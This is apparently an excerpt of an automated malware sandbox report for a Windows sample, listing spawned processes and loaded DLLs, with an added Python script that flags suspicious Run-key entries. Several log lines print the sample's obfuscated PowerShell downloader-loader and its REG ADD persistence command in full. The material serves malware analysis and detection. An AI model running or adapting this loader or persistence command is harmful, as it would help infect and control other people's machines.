DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
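The REG ADD above is the persistence mechanism: a Run value of type REG_EXPAND_SZ whose program is a user-defined environment variable (%Ulykkesfugles%, expanded at logon, so the launcher's real name never appears in the Run key) followed by a PowerShell one-liner that reads its actual script from a custom key (HKCU:\Indfindendes, value Storborgernes) and runs it. The following is an added triage script for this pattern; it is not code from Joe Sandbox or from the sample. It parses the text printed by `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`; the sample output is constructed, with one typical benign entry and the value written by the REG ADD on this page. The allowlist of environment variables, the marker list and the function names are this example's own choices.

```python
"""Triage of HKCU Run values for the launcher pattern written by REG ADD above:
a REG_EXPAND_SZ entry whose program is a user-defined %VARIABLE% (expanded at
logon, so the real launcher name never appears in the Run key) followed by a
PowerShell one-liner that pulls its script out of a custom registry key.

Added example for this report, not code from Joe Sandbox or from the sample.
It parses the text that `reg query HKCU\...\Run` prints. SAMPLE_REG_QUERY is
constructed: the OneDrive line is a typical benign entry, the other line is the
value from the REG ADD command on this page.
"""
from __future__ import annotations

import re

# Variables that legitimately show up in REG_EXPAND_SZ Run data. Any other
# %NAME% is user-defined and is the first thing to chase down.
KNOWN_ENV_VARS = {
    "SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "PROGRAMFILES", "PROGRAMFILES(X86)",
    "COMMONPROGRAMFILES", "PROGRAMDATA", "APPDATA", "LOCALAPPDATA",
    "USERPROFILE", "TEMP", "TMP",
}

# Markers of a PowerShell launcher that stores its script in the registry.
# "-w 1" is "-WindowStyle Hidden" (1 is the Hidden enum value).
POWERSHELL_MARKERS = [
    ("reads a registry value with Get-ItemProperty", re.compile(r"Get-ItemProperty", re.I)),
    ("references an HKCU: PowerShell drive path", re.compile(r"\bHKCU:\\", re.I)),
    ("hidden window (-w 1 / -WindowStyle Hidden)", re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)),
    ("Invoke-Expression / iex", re.compile(r"\biex\b|Invoke-Expression", re.I)),
]

# Constructed `reg query` output: a benign entry plus the value from this report.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Scleroconjunctival    REG_EXPAND_SZ    %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)
"""


def parse_reg_query(text: str) -> list[tuple[str, str, str]]:
    """Return (name, type, data) for each value line. reg query indents value
    lines and separates the three columns with runs of spaces."""
    values = []
    for line in text.splitlines():
        if not line.startswith("    "):
            continue  # key path line or blank line
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) == 3 and parts[1].startswith("REG_"):
            values.append((parts[0], parts[1], parts[2]))
    return values


def suspicious_reasons(vtype: str, data: str) -> list[str]:
    """Reasons a Run value deserves a look; an empty list means none."""
    reasons = []
    env_refs = {v.upper() for v in re.findall(r"%([^%\s]+)%", data)}
    unknown = sorted(env_refs - KNOWN_ENV_VARS)
    if unknown:
        reasons.append("user-defined env var(s): " + ", ".join(unknown))
        if vtype == "REG_EXPAND_SZ" and not re.search(r"\.exe\b", data, re.I):
            reasons.append("REG_EXPAND_SZ with no literal executable path")
    hits = [label for label, rx in POWERSHELL_MARKERS if rx.search(data)]
    if hits:
        reasons.append("PowerShell launcher markers: " + "; ".join(hits))
    return reasons


def flag_run_values(text: str) -> dict[str, list[str]]:
    """Map each flagged value name to its reasons."""
    flagged = {}
    for name, vtype, data in parse_reg_query(text):
        reasons = suspicious_reasons(vtype, data)
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in flag_run_values(SAMPLE_REG_QUERY).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

On the sample the OneDrive entry passes and Scleroconjunctival is flagged three times (user-defined variable, no literal executable in a REG_EXPAND_SZ value, PowerShell launcher markers). This excerpt of the report does not show where %Ulykkesfugles% is defined; on a live host, check the user's HKCU\Environment and HKCU\Volatile Environment keys for it, and read HKCU\Indfindendes\Storborgernes to recover the script the one-liner executes.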
            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
